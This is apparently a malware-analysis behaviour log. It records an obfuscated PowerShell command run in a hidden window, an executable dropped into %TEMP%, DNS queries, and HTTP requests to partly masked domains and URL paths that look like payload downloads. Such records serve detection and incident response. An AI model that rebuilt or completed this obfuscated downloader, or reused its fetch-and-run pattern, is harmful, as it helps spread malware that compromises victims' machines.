Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::JOIn('', ( '11o95-73S105o102,105-15p18l15o65l74,88o2p64S77T69g74,76-91-15S93S78I65o75{64g66{20l11-107g118p108-73S70T15,18T15T65g74{88l2{64S77g69g74T76I91-15l124,86o92,91-74-66I1o97I74...
- %TEMP%\515547.exe
- %TEMP%\515547.exe
- 'ra##foto.de':80
- 'ra##foto.de':443
- 'im######iumfortmyers.com':80
- 'gr####akreatif.com':80
- http://ra##foto.de/wpp-app/hlsgofCiuB/
- http://www.im######iumfortmyers.com/packages/core_commerce/AtATdgd3M/
- http://www.gr####akreatif.com/wp-content/lYODCs/
- 'ra##foto.de':443
- DNS ASK ir######emsolverstax.com
- DNS ASK ht##.nichost.ru
- DNS ASK ra##foto.de
- DNS ASK im######iumfortmyers.com
- DNS ASK gr####akreatif.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [striNG]::JOIn('', ( '11o95-73S105o102,105-15p18l15o65l74,88o2p64S77T69g74,76-91-15S93S78I65o75{64g66{20l11-107g118p108-73S70T15,18T15T65g74{88l2{64S77g69g74T76I91-15l124,86o92,91-74-66I1o97I74...' (with hidden window)